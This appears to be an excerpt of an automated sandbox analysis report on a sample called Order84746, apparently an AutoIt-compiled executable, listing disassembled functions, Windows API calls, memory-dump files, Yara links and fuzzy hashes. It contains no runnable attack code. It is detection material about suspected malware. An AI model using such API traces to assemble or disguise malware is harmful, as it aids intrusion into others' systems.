                          Function 0094EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008FAFE3
                            • Part of subcall function 008FAF83: SelectObject.GDI32(?,00000000), ref: 008FAFF2
                            • Part of subcall function 008FAF83: BeginPath.GDI32(?), ref: 008FB009
                            • Part of subcall function 008FAF83: SelectObject.GDI32(?,00000000), ref: 008FB033
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0094EA8E
                          • LineTo.GDI32(00000000,?,?), ref: 0094EA9B
                          • EndPath.GDI32(00000000), ref: 0094EAAB
                          • StrokePath.GDI32(00000000), ref: 0094EAB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: e9684ae89eac9de72366e542a8ef2169b541cb8b27b5c4d29902d4f40b9dbd1f
                          • Instruction ID: 77d61d8b8b1f56195195ce904fd25735688c1cfcfd8b2b996509e8b6ed35701e
                          • Opcode Fuzzy Hash: e9684ae89eac9de72366e542a8ef2169b541cb8b27b5c4d29902d4f40b9dbd1f
                          • Instruction Fuzzy Hash: 65F0E23151A258BBDB129FA4AC0DFCE3F19AF0A310F084105FF21A00E187B45511EBD6
                          Function 0091C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0091C84A
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0091C85D
                          • GetCurrentThreadId.KERNEL32 ref: 0091C864
                          • AttachThreadInput.USER32(00000000), ref: 0091C86B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: 537dfd79bf0c4e2cb9bc3495a23bd630992dcf3e55f8db97d8fda5148b479d24
                          • Instruction ID: 47b5dc6cee65119ddfb0d6a10c203baddc1f77366abeba6582f80a00fd02a0c9
                          • Opcode Fuzzy Hash: 537dfd79bf0c4e2cb9bc3495a23bd630992dcf3e55f8db97d8fda5148b479d24
                          • Instruction Fuzzy Hash: 2CE0657165622876DB105BA1DC4DEDB7F1CEF067A1F008015F51D84460C6F1C580D7E0
                          Function 0091B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 0091B0D6
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,0091AC9D), ref: 0091B0DD
                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0091AC9D), ref: 0091B0EA
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,0091AC9D), ref: 0091B0F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          • API String ID: 3974789173-0
                          • Opcode ID: 8416f860ac9117735e6f423358708641cf6740eaae6678692708ec65457f4237
                          • Instruction ID: fff1dde363c6e5d55e5c16c8cdb0d891259195435a6cbae2c337761b289d567b
                          • Opcode Fuzzy Hash: 8416f860ac9117735e6f423358708641cf6740eaae6678692708ec65457f4237
                          • Instruction Fuzzy Hash: E7E04F32B162129BE7201FB25C0CB873BADAF59795F02881CE261D6040DAA484419760
                          Function 008FB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000008), ref: 008FB496
                          • SetTextColor.GDI32(?,000000FF), ref: 008FB4A0
                          • SetBkMode.GDI32(?,00000001), ref: 008FB4B5
                          • GetStockObject.GDI32(00000005), ref: 008FB4BD
                          • GetWindowDC.USER32(?,00000000), ref: 0095DE2B
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0095DE38
                          • GetPixel.GDI32(00000000,?,00000000), ref: 0095DE51
                          • GetPixel.GDI32(00000000,00000000,?), ref: 0095DE6A
                          • GetPixel.GDI32(00000000,?,?), ref: 0095DE8A
                          • ReleaseDC.USER32(?,00000000), ref: 0095DE95
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                          • String ID:
                          • API String ID: 1946975507-0
                          • Opcode ID: 7a8612b8f7ffefba2104eb7a1644dfcbf61c146a22232e2cf3b657f8e72a1930
                          • Instruction ID: 41bb358a8de3208002a6ccc80e3ad9ed579a3d60e2729ece2593423b6a7b5886
                          • Opcode Fuzzy Hash: 7a8612b8f7ffefba2104eb7a1644dfcbf61c146a22232e2cf3b657f8e72a1930
                          • Instruction Fuzzy Hash: 0CE06D31619240AAEF215B75EC0DBD83B11EB1333AF00C22AFA7A980E1C3F18584EB11
                          Function 0095B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: d1a65e26c32dd47ec1af93d4d13074569e217e3260917af13c678c5a8b1dd0dd
                          • Instruction ID: d75699f153f90ef442a2b02af7ed27c45e8471bb016b47730b3bf93c021ed321
                          • Opcode Fuzzy Hash: d1a65e26c32dd47ec1af93d4d13074569e217e3260917af13c678c5a8b1dd0dd
                          • Instruction Fuzzy Hash: 46E04FB1A14208EFDB005F70CC4862D7BA5FB4C351F11C809FD6AC7250CBB49840AF51
                          Function 0095B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 1fe30d10c548b6daf82c66a3d10e7185d5bcbc74ad67151e4ca6288024f6ed14
                          • Instruction ID: d7a59b22a2dcae02a6e96399a69f6e90e176fe7198a3c6107a5ec0db5a06c24a
                          • Opcode Fuzzy Hash: 1fe30d10c548b6daf82c66a3d10e7185d5bcbc74ad67151e4ca6288024f6ed14
                          • Instruction Fuzzy Hash: D6E046B1A14208EFDB005F70CC4862D7BA9FB4C390F128809FA6ACB250CBB89800AB50
                          Function 0091DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                          Download Yara Rule
                          APIs
                          • OleSetContainedObject.OLE32(?,00000001), ref: 0091DEAA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ContainedObject
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 3565006973-3941886329
                          • Opcode ID: cb39edef4517bff7a5cb31a7985554f2a7026ac2ea3ea24a659ff1c08b1ad9f2
                          • Instruction ID: 6997cb39a2a1cd57f6fbccf3b68f0345e5ccb5496062b9fa0ce15155b83d0f9c
                          • Opcode Fuzzy Hash: cb39edef4517bff7a5cb31a7985554f2a7026ac2ea3ea24a659ff1c08b1ad9f2
                          • Instruction Fuzzy Hash: 80913674601705AFDB14CF68C884BAAB7F9BF49710F10886DF95ACB691DB70E981CB60
                          Function 008FBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 008FBCDA
                          • GlobalMemoryStatusEx.KERNEL32 ref: 008FBCF3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: c4aa32e571b4d93a01bc27e2b6e840ddef6a387f9521a17c520997bdddc714b7
                          • Instruction ID: dd76b5d021bfad57c478b2be289bced264205b517afb46aae8271a0e2140036a
                          • Opcode Fuzzy Hash: c4aa32e571b4d93a01bc27e2b6e840ddef6a387f9521a17c520997bdddc714b7
                          • Instruction Fuzzy Hash: 13513A715187489BE320AF28DC85BAFBBE8FF94354F41484EF2C8820A2DF7085688757
                          Function 0092C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E44ED: __fread_nolock.LIBCMT ref: 008E450B
                          • _wcscmp.LIBCMT ref: 0092C65D
                          • _wcscmp.LIBCMT ref: 0092C670
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscmp$__fread_nolock
                          • String ID: FILE
                          • API String ID: 4029003684-3121273764
                          • Opcode ID: 1fd92b7e2f74f287e9fff8d42a8cc5da288828f27b99e879446e061443969654
                          • Instruction ID: 9276c65eb433e0c9d3fbcb1cd361aae815fcdac9d4c5f962c27d7414e974e0e1
                          • Opcode Fuzzy Hash: 1fd92b7e2f74f287e9fff8d42a8cc5da288828f27b99e879446e061443969654
                          • Instruction Fuzzy Hash: B441E372A0025ABBDF20ABA49C41FEF77BDEF89704F001469F605EB181D6719A048B61
                          Function 0094A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0094A85A
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0094A86F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: b97dfacd94cf26e067914055397f12ca80af61b8ac47d63052882b9d5cc2f75a
                          • Instruction ID: ebc34c7200b98a85876b38b4b3fd71d1063288e14f5de2d7b57e735702cf8279
                          • Opcode Fuzzy Hash: b97dfacd94cf26e067914055397f12ca80af61b8ac47d63052882b9d5cc2f75a
                          • Instruction Fuzzy Hash: 1C41F475E412099FDB14CF68C880FDA7BB9FB09300F14006AE905EB381D771A942CFA1
                          Function 00935180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00935190
                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009351C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CrackInternet_memset
                          • String ID: |
                          • API String ID: 1413715105-2343686810
                          • Opcode ID: 21d2b5784a406581e6b6975796583497f7d97ef0662b47b8d01ff9fbbcde5215
                          • Instruction ID: 611018bac6f764d6b62b70d7abc9dfd4c6e1f942faabf83ed602b247685f04d5
                          • Opcode Fuzzy Hash: 21d2b5784a406581e6b6975796583497f7d97ef0662b47b8d01ff9fbbcde5215
                          • Instruction Fuzzy Hash: B3312671C00119ABCF01EFA5CC85EEEBFB9FF59710F100019F915A6166EB31AA46DBA1
                          Function 0094975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 0094980E
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0094984A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          • Opcode ID: 1955bc36c94ccdc8b8cd506f9b6943151e1daa874597986c804705776f2ee705
                          • Instruction ID: fa5140fb13602c8420f7acde20f878111b195fdf531a2a90e529095264926c48
                          • Opcode Fuzzy Hash: 1955bc36c94ccdc8b8cd506f9b6943151e1daa874597986c804705776f2ee705
                          • Instruction Fuzzy Hash: B0317A71510608AAEB109F78CC81FBB73ADFF99764F008619F9A9C7190DA71AC81DB60
                          Function 00925157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 009251C6
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00925201
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: 2f8d6fa0397038a7c8174e2f9d14724d435344f03c305f8d228b3cfe264465c5
                          • Instruction ID: 878b4d5344034b9177a4c2f75737ef4f8653824245ed794698d04b9b0853241f
                          • Opcode Fuzzy Hash: 2f8d6fa0397038a7c8174e2f9d14724d435344f03c305f8d228b3cfe264465c5
                          • Instruction Fuzzy Hash: 2731E471A00724EBEB28CF99E845BAEBBF8FF85350F150019E9A1E61E4D7709A44CB50
                          Function 0093658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __snwprintf
                          • String ID: , $$AUTOITCALLVARIABLE%d
                          • API String ID: 2391506597-2584243854
                          • Opcode ID: f68fb9c5a42782d622b234f64175e666f6c46094c24c77b30074410d43dfa09f
                          • Instruction ID: 13efd0469057cd231222f26ce5e2cbb4319a6aa5dbaed251b46dd1af1e07509a
                          • Opcode Fuzzy Hash: f68fb9c5a42782d622b234f64175e666f6c46094c24c77b30074410d43dfa09f
                          • Instruction Fuzzy Hash: 59218E71A00219ABCF10EF69C882AAE77B4FF85348F008459F505EB181DB70EA55CBA2
                          Function 009493CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0094945C
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00949467
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: fc09ee9508a1b2cb6014187b4f72ef73a1c52aa638de616df64970811526e7ab
                          • Instruction ID: be7bf6d7d4ca4424279fd6aa5f7a3407df98d10ed1a69818b840393b22745965
                          • Opcode Fuzzy Hash: fc09ee9508a1b2cb6014187b4f72ef73a1c52aa638de616df64970811526e7ab
                          • Instruction Fuzzy Hash: 2011C4713102186FEF21DF58DC80EBB376FEB893A4F100125F918972A0D6719C528760
                          Function 009498FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008FD1BA
                            • Part of subcall function 008FD17C: GetStockObject.GDI32(00000011), ref: 008FD1CE
                            • Part of subcall function 008FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008FD1D8
                          • GetWindowRect.USER32(00000000,?), ref: 00949968
                          • GetSysColor.USER32(00000012), ref: 00949982
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
